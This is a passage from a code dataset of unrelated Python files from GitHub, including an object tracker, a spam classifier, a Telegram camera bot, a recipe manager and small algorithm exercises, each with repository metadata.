/ 2)\n if parent >= 1 and nums[parent] < nums[idx]:\n heapUp(idx)\n else:\n heapDown(idx)\n\n def heapify():\n j = k\n while j > 0:\n heapDown(j)\n j -= 1\n\n firstMaxVal = 0\n i = 0\n while i < k:\n if i != 0:\n handleByOrgId[i] = i\n handleByCurId[i] = i\n firstMaxVal = max(firstMaxVal, nums[i])\n i += 1\n\n returnList = [firstMaxVal]\n handleByOrgId[k] = k\n handleByCurId[k] = k\n heapify()\n\n p = k + 1\n q = 1\n while p < len(nums):\n returnList.append(nums[1])\n updateIdx = handleByOrgId[q]\n\n q = q + 1\n nums[updateIdx] = nums[p]\n handleByOrgId[p] = updateIdx\n handleByCurId[updateIdx] = p\n heapUpOrDown(updateIdx)\n p = p + 1\n\n returnList.append(nums[1])\n return returnList\n\n\nnums = [1,3,-1,-3,5,3,6,7]\nk =3\nsl = Solution()\nprint(sl.maxSlidingWindow(nums, k))\n","repo_name":"shashiram/Data-Structures-and-Algorithms","sub_path":"MaxSlidingWindow.py","file_name":"MaxSlidingWindow.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42332301545","text":"import json\nfrom pathlib import Path\n\nfrom OTVision.config import CONFIG\nfrom OTVision.helpers.files import denormalize, get_files\nfrom OTVision.helpers.log import log\n\nfrom .iou import track_iou\nimport torch\nimport os\n\nfrom OTVision.siam import NeuralNetwork\nfrom OTVision.track.cluster_track import dbscan\n\n\ndef main(\n paths,\n yolo_mode=\"spp\", # Why yolo mode?\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n debug: bool = CONFIG[\"TRACK\"][\"DEBUG\"],\n clustering=CONFIG[\"TRACK\"][\"CLUSTERING\"],\n):\n log.info(\"Start tracking\")\n if debug:\n log.setLevel(\"DEBUG\")\n log.debug(\"Debug mode on\")\n\n filetype = CONFIG[\"DEFAULT_FILETYPE\"][\"DETECT\"]\n detections_files = get_files(paths, filetype)\n\n # kav 200922\n model_siam = NeuralNetwork()\n model_siam.eval()\n if torch.cuda.is_available():\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cuda:0')))\n model_siam = model_siam.cuda()\n else:\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cpu')))\n model_siam = model_siam.cpu()\n\n\n\n for detections_file in detections_files:\n log.info(f\"Try tracking {detections_file}\")\n\n try:\n with open(detections_file) as f:\n detections = json.load(f)\n log.info(f\"{filetype} read\")\n\n detections_denormalized = denormalize(detections)\n log.info(\"Detections denormalized\")\n\n dir = os.path.dirname(detections_file)\n file_name = os.path.basename(detections_file).split('.')[0]\n dir_features = os.path.join(dir, file_name + '_features')\n\n tracks_px, trajectories_geojson = track(\n detections=detections_denormalized,\n yolo_mode=yolo_mode,\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n dir_features=dir_features,\n )\n\n log.info(\"Detections tracked\")\n if clustering:\n tracks_px = dbscan(tracks_px)\n # print(bad_id)\n\n write(\n tracks_px=tracks_px,\n detections_file=detections_file,\n overwrite=overwrite,\n )\n except OSError as oe:\n log.error(\n (\n f'Could not open \"{detections_file}\". 
'\n f\"Following exception occured: {str(oe)}\"\n )\n )\n except json.JSONDecodeError as je:\n log.error(\n (\n f'Unable to decode \"{detections_file}\" as JSON.'\n f\"Following exception occured: {str(je)}\"\n )\n )\n\n\ndef track(\n detections,\n yolo_mode=\"spp\",\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n model_siam=None, # kav 200922\n dir_features='',\n):\n new_detections, trajectories_geojson, vehIDs_finished = track_iou(\n detections=detections[\"data\"],\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n w_frame=detections['vid_config']['width'],\n h_frame=detections['vid_config']['height'],\n dir_features=dir_features,\n )\n\n trk_config = {\n \"yolo_mode\": yolo_mode,\n \"tracker\": \"IOU\",\n \"sigma_l\": sigma_l,\n \"sigma_h\": sigma_h,\n \"sigma_iou\": sigma_iou,\n \"t_min\": t_min,\n \"t_miss_max\": t_miss_max,\n }\n\n tracks_px = {\n \"vid_config\": detections[\"vid_config\"],\n \"det_config\": detections[\"det_config\"],\n \"trk_config\": trk_config,\n \"data\": new_detections,\n }\n\n return tracks_px, trajectories_geojson\n\n\n# TODO: Implement overwrite as in detect, maybe refactor?\ndef write(\n tracks_px,\n detections_file,\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n):\n # ?: Check overwrite before tracking instead of before writing tracking?\n # TODO: Export also as csv, trj and alternative json\n tracks_file = Path(detections_file).with_suffix(CONFIG[\"DEFAULT_FILETYPE\"][\"TRACK\"])\n tracks_file_already_exists = tracks_file.is_file()\n if overwrite or not tracks_file_already_exists:\n # Write JSON\n with open(tracks_file, \"w\") as f:\n json.dump(tracks_px, f, indent=4)\n if tracks_file_already_exists:\n log.info(f\"{tracks_file} overwritten\")\n else:\n log.info(f\"{tracks_file} file written\")\n else:\n log.info(f\"{tracks_file} already exists. To overwrite, set overwrite=True\")\n","repo_name":"Kommunarus/otv","sub_path":"OTVision/track/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23716253286","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport pymysql\nimport numpy as np\nimport pickle\n\n\"\"\"\nStep1. data load\n\"\"\"\ndef loading_data():\n ## DB connection\n conn = pymysql.connect(host = \"127.0.0.1\", user = [USER], passwd = [PASSWORD], db = [DATABASE], cursorclass = pymysql.cursors.DictCursor)\n cur = conn.cursor()\n \n cur.execute(\"show databases\")\n cur.execute(\"use crawling\")\n\n ## Table data loading\n # news\n query = \"\"\" \n select * from news_counting;\n \"\"\"\n cur.execute(query)\n news_df = pd.DataFrame(list(cur.fetchall())).drop(['id'], axis=1)\n news_df.head()\n\n # portal\n # 카카오변수 제외, 구글/네이버를 활용하기위해 \n # 네이버 변수가 값을 갖는 2016년 1월부터 데이터 사용\n query = \"\"\" \n select * from portal_trends_ratio ;\n \"\"\"\n cur.execute(query)\n portal_df = pd.DataFrame(list(cur.fetchall()))\n portal_df = portal_df[['year', 'month', 'day', 'google', 'naver']][17:]\n\n ## response y: CCSI(소비자심리지수)\n query = \"\"\" \n select * from ccsi ;\n \"\"\"\n cur.execute(query)\n conn.close()\n cur.close()\n # X와 기간을 맞춤\n ccsi = pd.DataFrame(list(cur.fetchall()))[4:].reset_index(drop = True)\n\n return news_df, portal_df, ccsi\n\n\n\n\"\"\"\nStep2. X, y dataframe\n\"\"\"\n\n# 달의 마지막주인지 확인하는 function\ndef isLastWeekOfThisMonth(X, index):\n if(index == (len(X) - 1)):\n return True\n if ( X.iloc[index].month != X.iloc[index + 1].month ):\n return True\n return False\n\n# 달의 마지막 주차이면, 해당 달의 데이터들의 평균값들을 하나의 record로 갖는 dataframe 생성\ndef getYdataframe(X, y):\n count = 0\n y_weekly = pd.DataFrame()\n\n for i in range(len(X)):\n count+= 1\n\n if ( isLastWeekOfThisMonth(X, i) ):\n a = np.where((y.month == X.iloc[i].month) & (y.year == X.iloc[i].year ))[0]\n present_ccsi = float(y.iloc[a].ccsi)\n \n past_ccsi = float(y.iloc[a-1].ccsi)\n sub = present_ccsi - past_ccsi\n \n for index in range(count):\n n = ((index+1) / count)*(sub)+past_ccsi\n record = pd.Series([int(X.iloc[i].year), int(X.iloc[i].month), int(X.iloc[i-(count-index)+1].day), n])\n row_df = pd.DataFrame([record])\n y_weekly = pd.concat([y_weekly, row_df], ignore_index=True)\n \n \n count = 0\n \n return y_weekly\n\n# df column명 정해주는 function\ndef renameXdataframe(X):\n X.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'keyword1', 4: 'keyword2', 5: 'keyword3', 6: 'keyword4', 7: 'keyword5', 8: 'google', 9: 'naver'}, inplace = True)\n return X.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef renameYdataframe(y):\n y.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'ccsi'}, inplace = True)\n return y.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef getX_y_dateframe():\n news_df, portal_df, ccsi = loading_data()\n predictors = pd.merge(news_df, portal_df)\n\n y_df = getYdataframe(predictors, ccsi)\n y_df = renameYdataframe(y_df)\n X_df = renameXdataframe(predictors)\n \n return X_df, predictors, y_df\n\n\"\"\"\nStep3. 
Modeling\n- split train and test set\n\"\"\"\ndef getTrainTestSet(X_df, ccsi):\n df = pd.merge(X_df, ccsi)\n X = df[['keyword1', 'keyword2', 'keyword3', 'keyword4', 'keyword5', 'google', 'naver']] # X: 예측변수 dataframe\n y = df[['ccsi']] # y: 반응변수 dataframe\n\n # CV를 활용하기 위해, validate set은 따로 분할하지 않는다.\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, test_size=0.2, shuffle=False)\n\n return X_train, X_test, y_train, y_test\n \n\n###################### main ######################\nif __name__ == \"__main__\":\n X_df, predictors, ccsi = getX_y_dateframe()\n X_train, X_test, y_train, y_test = getTrainTestSet(X_df, ccsi) \n pickle.dump(X_train, open('./dataset/dataset_interpolation/X_train.pkl','wb'))\n pickle.dump(X_test, open('./dataset/dataset_interpolation/X_test.pkl','wb'))\n pickle.dump(y_train, open('./dataset/dataset_interpolation/y_train.pkl','wb'))\n pickle.dump(y_test, open('./dataset/dataset_interpolation/y_test.pkl','wb'))\n pickle.dump(ccsi, open('./dataset/dataset_interpolation/ccsi.pkl','wb'))\n pickle.dump(predictors, open('./dataset/dataset_interpolation/predictors.pkl','wb'))\n","repo_name":"2hyes/CLI-development","sub_path":"getTrainTestSet/getTrainTestSet_interpolation.py","file_name":"getTrainTestSet_interpolation.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"35494544623","text":"import logging.config\n\nimport click\n\nfrom .version import VERSION\nfrom .worker import RunWorkerProcess, import_string\n\nburst_help = 'Batch mode: exit once no jobs are found in any queue.'\nhealth_check_help = 'Health Check: run a health check and exit'\nverbose_help = 'Enable verbose output.'\n\n\n@click.command()\n@click.version_option(VERSION, '-V', '--version', prog_name='arq')\n@click.argument('worker-path', type=click.Path(exists=True, dir_okay=False, file_okay=True), required=True)\n@click.argument('worker-class', default='Worker')\n@click.option('--burst/--no-burst', default=False, help=burst_help)\n@click.option('--check', is_flag=True, help=health_check_help)\n@click.option('-v', '--verbose', is_flag=True, help=verbose_help)\ndef cli(*, worker_path, worker_class, burst, check, verbose):\n \"\"\"\n Job queues in python with asyncio, redis and msgpack.\n\n CLI to run the arq worker.\n \"\"\"\n worker = import_string(worker_path, worker_class)\n logging.config.dictConfig(worker.logging_config(verbose))\n\n if check:\n exit(worker.check_health())\n else:\n RunWorkerProcess(worker_path, worker_class, burst)\n","repo_name":"justlittle/arq","sub_path":"arq/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"54255874396","text":"# import sys\n# sys.path.append('.')\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import svm\nimport psycopg2\ndef spam(review):\n df1 = pd.read_csv(\"machine/Sigma-Channel1.csv\")\n df2 = pd.read_csv(\"machine/Sigma-Channel2.csv\")\n df3 = pd.read_csv(\"machine/Sigma-Channel3.csv\")\n df4 = pd.read_csv(\"machine/Sigma-Channel4.csv\")\n df5 = pd.read_csv(\"machine/Sigma-Channel5.csv\")\n\n frames = [df1, df2, df3, df4, df5]\n # create a single data frame\n df_merged = pd.concat(frames)\n\n # assigning keys to allow model know the respective database\n keys = [\"Channel1\",\"Channel2\",\"Channel3\",\"Channel4\",\"Channel5\"]\n df_with_keys = pd.concat(frames,keys=keys)\n\n df = df_with_keys\n # extracting columns from database\n df_data = df[[\"CONTENT\",\"CLASS\"]]\n\n df_x = df_data['CONTENT']\n df_y = df_data['CLASS']\n\n corpus = df_x\n # raw texts are converted to vector numeric values. Preparing to fit in\n # machine learning model\n cv = CountVectorizer()\n X = cv.fit_transform(corpus)\n # Algorithm will use 70% of data for training model, 30% will be used for model testing.\n X_train, X_test, y_train, y_test = train_test_split(X, df_y, test_size=0.30, random_state=42)\n # Naive Bayes algorithm to train the spam model\n clf = MultinomialNB()\n # fitting model into dataset to identify pattterns and insights of the dataset\n clf.fit(X_train,y_train)\n\n comment = [\"{}\".format(review)]\n test_score = clf.score(X_train, y_train) * 100\n print(f\"Accuracy = {test_score:.2f}%\")\n # converting result into array\n vect = cv.transform(comment).toarray()\n result = clf.predict(vect)\n\n if (result[0] == 1):\n return True\n\n return False\n","repo_name":"AiXueK/Movie-Search-Web","sub_path":"project/backend/machine/spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2904987683","text":"from board import Board\nfrom human_control import HumanControl\n\n\ndef test_board_check():\n # initialize 5 * 5 board to test\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n hc1.board_check()\n # check the valid positions\n valid1 = (0, 0)\n valid2 = (1, 3)\n assert valid1 in hc1.vaild_positions\n assert valid2 in hc1.vaild_positions\n\n\ndef test_line_check():\n # still use board1 to check\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n # pick a valid cell to test\n col = 1\n row = 3\n # check the valid line: upper right\n xadd = 1\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # check an invaild line: up\n xadd = 0\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # pick an invalid cell to test\n col = 3\n row = 2\n for xadd in hc1.ADD:\n for yadd in hc1.ADD:\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(1, 3)]\n","repo_name":"LinzheHE/Othello_Game","sub_path":"human_control_test.py","file_name":"human_control_test.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73541241928","text":"class LoadTraceInstruction(object):\n \"\"\"Track load trace instruction in an orderly manner.\"\"\"\n def __init__(self, line):\n tokens = line.split(', ')\n self.uiid = int(tokens[0])\n self.cycle = int(tokens[1])\n self.addr = int(tokens[2], 16)\n self.pc = int(tokens[3], 16)\n self.is_hit = bool(tokens[4])\n\n # List of (pc, dec) tuples, from most recent to least recent.\n #print(tokens[5:])\n self.branches = [(int(tokens[i], 16), bool(int(tokens[i + 1]))) for i in range(5, len(tokens), 2)]\n\n def __str__(self):\n s = f'uiid={self.uiid} cycle={self.cycle} pc={hex(self.pc)} addr={hex(self.addr)} is_hit={self.is_hit} branches=['\n for pc, dec in self.branches:\n if pc == 0 and not dec:\n continue\n s += f'(pc={hex(pc)} dec={\"T\" if dec else \"NT\"})'\n s += ']'\n return s\n\n\ndef get_instructions(f):\n \"\"\"Process the load trace as a generator, (note the yield)\n yielding every loaded data address.\n Can call using gather_correlation_data inside an\n open (or variant) context.\"\"\"\n for line in f:\n # For handling some invalid lines in the ML-DPC load traces\n if line.startswith('***') or line.startswith('Read'):\n continue\n yield LoadTraceInstruction(line)\n","repo_name":"cmolder/voyager-analysis","sub_path":"utils/load_trace.py","file_name":"load_trace.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73101577928","text":"import dataset\r\n\r\nasync def get_data(players: list, table_players: dataset.Table, lobby: dict) -> dict:\r\n data = {}\r\n questions = []\r\n for i in range(len(players)):\r\n player_db = table_players.find_one(user=players[i], game=lobby.get(\"code\"))\r\n questions.append(list(player_db.get(\"data\")))\r\n \r\n questions = [elem[0] for elem in questions]\r\n\r\n for question in questions:\r\n answers = {}\r\n for player in players:\r\n try:\r\n answers[player] = table_players.find_one(user=player).get(\"data\")[question]\r\n except KeyError:...\r\n data[question] = answers\r\n \r\n return data\r\n\r\n","repo_name":"belkinark/NotipBox","sub_path":"utils/text2player.py","file_name":"text2player.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21435582614","text":"# -*- coding: utf-8 -*-\n\nimport telebot\nimport datetime\nimport os\nfrom picamera import PiCamera\nfrom homie import settings\nfrom homie.utils import *\nfrom homie.security import *\nfrom homie.classes import *\n\nbot = telebot.TeleBot(settings.API_TOKEN)\ncamera = PiCamera()\n\n\n@bot.message_handler(commands=['enviarvideo'])\ndef send_video(message):\n \"\"\"\n Captures a new video, saves it and sends it\n \"\"\"\n filename = '{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.VIDEO_EXTENSION\n )\n bot.send_message(message.chat.id, 'Grabando vídeo, esto puede llevar unos minutos...')\n camera.start_recording(filename)\n camera.wait_recording(settings.MAX_VIDEO_TIME)\n camera.stop_recording()\n bot.send_message(message.chat.id, 'Vídeo grabado, enviando...')\n bot.send_video(message.chat.id, open(filename, 'rb'))\n\n \n@bot.message_handler(commands=['enviarfoto'])\ndef send_photo(message):\n \"\"\"\n Captures a new image, saves it and sends it\n \"\"\"\n filename ='{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.IMAGE_EXTENSION\n )\n bot.send_message(message.chat.id, 'Enviando foto...')\n camera.capture(filename)\n bot.send_photo(message.chat.id, open(filename, 'rb'))\n log = ('Foto ' + filename + ' guardada por ' + message.chat.first_name + ' ' \n + message.chat.last_name + ' [' + str(message.chat.id) + ']')\n print(log)\n\n\n \ndef initialize():\n camera.rotation = settings.ROTATION.value\n camera.resolution = (\n settings.RESOLUTION.value['height'], \n settings.RESOLUTION.value['width']\n )\n\n\nif __name__ == '__main__':\n initialize()\n print('Bot listening!')\n bot.polling()\n","repo_name":"pablo-moreno/homie-legacy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37854425228","text":"from Entidades.receita import Receita\nfrom Telas.tela_receita import TelaReceita\nfrom Telas.tela_receita_acoes import TelaReceitaAcoes\nfrom Telas.tela_receita_view import TelaReceitaView\nfrom Telas.tela_receita_relatorio import TelaReceitaRelatorio\nfrom Entidades.ingrediente_receita import IngredienteReceita\nfrom DAOs.receita_dao import ReceitaDAO\nfrom DAOs.relatorio_dao import RelatorioDAO\nfrom Excecoes.empty_list_exception import EmptyListException\nfrom datetime import date\n\n\nclass ControladorReceita:\n def __init__(self, controlador_sistema):\n self.__controlador_sistema = controlador_sistema\n self.__controlador_ingrediente = self.__controlador_sistema.dao_ingrediente\n self.__dao = ReceitaDAO()\n self.__dao_relatorio = RelatorioDAO()\n self.__tela_receitas = TelaReceita()\n self.__tela_receitas_acoes = TelaReceitaAcoes()\n self.__tela_receita_view = TelaReceitaView()\n self.__tela_receita_relatorio = TelaReceitaRelatorio()\n self.__eventos_receita = []\n\n def abre_tela(self):\n lista_opcoes = {'cadastro': self.cadastrar_receita,\n 'alteracao': self.alterar_receita,\n 'view': self.visualizar_receita,\n 'relatorio': self.ver_relatorio_receita,\n 'exclusao': self.excluir_receita,\n 'retorna': self.retornar_menu_principal}\n\n while True:\n opcao_menu, valor_menu = self.__tela_receitas.abre_tela(self.__dao.get_all_names())\n self.__tela_receitas.fecha_tela()\n if opcao_menu is None:\n exit(0)\n\n if opcao_menu == 'alteracao' or opcao_menu == 'exclusao' or opcao_menu == 'view':\n lista_opcoes[opcao_menu](valor_menu['cb_opcao'])\n else:\n lista_opcoes[opcao_menu]()\n\n def cadastrar_receita(self):\n ingredientes_estoque = self.lista_ingredientes_menu()\n infos_tela = None\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n\n if dados_receita is None:\n self.cadastrar_receita()\n\n ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n\n nova_receita = Receita(dados_receita[\"titulo\"], ingredientes_receita, dados_receita[\"preparo\"])\n\n if nova_receita in self.__dao.get_all():\n self.__tela_receitas.erro_ja_cadastrado(nova_receita.titulo)\n self.abre_tela()\n self.__dao.add(nova_receita.titulo, nova_receita)\n self.registra_evento(\"Cadastro de receita\", nova_receita.titulo)\n\n def alterar_receita(self, titulo):\n ingredientes_estoque = self.lista_ingredientes_menu()\n receita_alterada = self.__dao.get(titulo)\n\n if receita_alterada is None:\n self.abre_tela()\n\n infos_tela = {'titulo': receita_alterada.titulo,\n 'preparo': receita_alterada.preparo,\n 'ingredientes': receita_alterada.ingredientes_receita}\n\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n else:\n if dados_receita is None:\n self.alterar_receita(titulo)\n\n self.__dao.remove(receita_alterada.titulo)\n receita_alterada.titulo = dados_receita[\"titulo\"]\n receita_alterada.ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n receita_alterada.preparo = dados_receita[\"preparo\"]\n self.__dao.add(receita_alterada.titulo, receita_alterada)\n\n self.registra_evento(\"Alteração de receita\", receita_alterada.titulo)\n self.abre_tela()\n\n def visualizar_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n if receita is None:\n self.abre_tela()\n\n ingredientes = ''\n for i in 
receita.ingredientes_receita:\n ingredientes += str(i.nome) + ' - ' + str(i.quantidade) + ' ' + str(i.unidade_medida) + '\\n'\n titulo = receita.titulo\n preparo = receita.preparo\n\n button_value = self.__tela_receita_view.abre_tela(titulo, ingredientes, preparo)\n self.registra_evento(\"Pesquisa de receita\", receita.titulo)\n if button_value is None:\n exit(0)\n elif button_value == 'retornar':\n self.abre_tela()\n else:\n self.fazer_receita(titulo)\n\n def fazer_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n for i in receita.ingredientes_receita:\n ingrediente_estoque = self.__controlador_ingrediente.get(i.nome)\n if ingrediente_estoque.quantidade < i.quantidade:\n self.__tela_receita_view.erro_ingredientes_insuficientes(i.nome)\n self.abre_tela()\n\n for i in receita.ingredientes_receita:\n ingrediente_deduzir = self.__controlador_ingrediente.get(i.nome)\n ingrediente_deduzir.quantidade -= i.quantidade\n self.__controlador_ingrediente.add(ingrediente_deduzir.nome, ingrediente_deduzir)\n self.__tela_receitas.feedback_sucesso()\n\n self.registra_evento(\"Receita feita\", titulo)\n\n def ver_relatorio_receita(self):\n try:\n if not self.__dao_relatorio.get():\n raise EmptyListException()\n\n relatorio = ''\n for i in self.__dao_relatorio.get():\n relatorio += i + '\\n'\n self.__tela_receita_relatorio.abre_tela(relatorio)\n\n except EmptyListException:\n self.abre_tela()\n\n def excluir_receita(self, titulo):\n valor = self.__dao.remove(titulo)\n if valor == 'exception':\n self.abre_tela()\n self.__tela_receitas_acoes.feedback_sucesso()\n self.registra_evento(\"Exclusão de receita\", titulo)\n\n # ------ MÉTODOS INTERNOS ------\n\n def registra_evento(self, acao, receita):\n registro = ''\n registro += 'Ação: ' + acao + \" - Receita: \" + receita + \" - Data: \" + str(date.today())\n self.__dao_relatorio.add(registro)\n\n def criar_lista_ingredientes(self, dados_ingredientes: dict):\n ingredientes_receita = []\n for nome_ingrediente in dados_ingredientes:\n if nome_ingrediente != '':\n add_ingrediente = IngredienteReceita(self.__controlador_ingrediente.get(nome_ingrediente),\n dados_ingredientes[nome_ingrediente])\n ingredientes_receita.append(add_ingrediente)\n return ingredientes_receita\n\n def lista_ingredientes_menu(self):\n lista_ingredientes = self.__controlador_ingrediente.get_all()\n lista_menu = []\n for i in lista_ingredientes:\n ing = i.nome + ', [{}]'.format(i.unidade_medida)\n lista_menu.append(ing)\n return lista_menu\n\n def retornar_menu_principal(self):\n self.__controlador_sistema.abre_tela()\n","repo_name":"paulazomig/sistema-de-receitas","sub_path":"Controladores/controlador_receita.py","file_name":"controlador_receita.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11534512965","text":"\"\"\"Transformations to make to a given column's raw data.\"\"\"\nfrom datetime import datetime\n\ndef convert_utc_timestamp_to_datetime_string(utc_time: float) -> str:\n \"\"\"Given a UTC timestamp, convert to a human-readable date string.\n \n >>> convert_utc_timestamp_to_datetime_string(1679147878.0)\n Sunday, March 19, 2023, at 8:11:18 PM \n \"\"\"\n utc_datetime = datetime.fromtimestamp(utc_time)\n return utc_datetime.strftime(\"%A, %B %d, %Y, at %I:%M:%S %p\")\n\nMAP_COL_TO_TRANSFORMATION = {\n \"created_utc_string\": {\n \"original_col\": \"created_utc\",\n \"transform_func\": convert_utc_timestamp_to_datetime_string\n }\n}\n\nTRANSFORMATION_FIELDS_LIST = [\"created_utc_string\"]\n","repo_name":"mark-torres10/redditResearch","sub_path":"src/ml/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38777342707","text":"import sys\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\n# function\ndef cut(row, col, size):\n\t'''\n\tpaper[row][col]부터 시작하는 size*size 크기의 종이를 확인.\n\t모두 같은 수면 cnt 배열을 업데이트하고\n\t아니면 9등분해서 재귀함.\n\t'''\n\tisAll1 = isAll0 = isAllM1 = True\n\tfor r in range(row, row + size):\n\t\tfor c in range(col, col + size):\n\t\t\tif paper[r][c] == 0: isAll1 = isAllM1 = False\n\t\t\telif paper[r][c] == 1: isAllM1 = isAll0 = False\n\t\t\telse: isAll1 = isAll0 = False\n\t\tif not isAll1 and not isAll0 and not isAllM1: break\n\t\n\tif isAllM1: cnt[0] += 1\n\telif isAll0: cnt[1] += 1\n\telif isAll1: cnt[2] += 1\n\telse:\n\t\tsize //= 3\n\t\tfor i in range(3):\n\t\t\tfor j in range(3):\n\t\t\t\tcut(row + i * size, col + j * size, size)\n\n# input\nn = int(input())\npaper = [tuple(map(int, input().split())) for _ in range(n)]\n# process & output\ncnt = [0, 0, 0]\ncut(0, 0, n)\nprint(*cnt)","repo_name":"WaiNaat/TWS","sub_path":"QKIM/Acmicpc/A01780.py","file_name":"A01780.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21529243029","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread(r'C:\\Users\\indra094\\Documents\\scripts\\ResultImages\\veins1.jpeg')\nimggray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, thresh = cv2.threshold(imggray, 127, 255, 0)\nkernel = np.ones((2,2), np.uint8)\n\n#dilation = cv2.dilate(thresh, kernel, iterations=1)\nerosion = cv2.erode(thresh, kernel, iterations=5)\ndilation = cv2.dilate(erosion, kernel, iterations=5)\n\n \n# Find Canny edges\nedges = cv2.Canny(dilation, 30, 200)\n\ncontours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\ni=0\nfor cnt in contours:\n epsilon = 0.1*cv2.arcLength(cnt,True)\n approx = cv2.approxPolyDP(cnt,epsilon,True)\n #cv2.imshow(\"orig2\"+str(i), approx)\n print (cv2.arcLength(cnt,True))\n print (cv2.contourArea(cnt))\n i +=1\n#COUNTOURS vector of x,y - boundary points\n\nprint (len(contours))\n#print (contours[1])\n\ncv2.drawContours(dilation, contours, -1, (0, 255, 0), 1)\n\ncv2.imshow(\"orig\", dilation)\ncv2.imshow(\"eroded\", 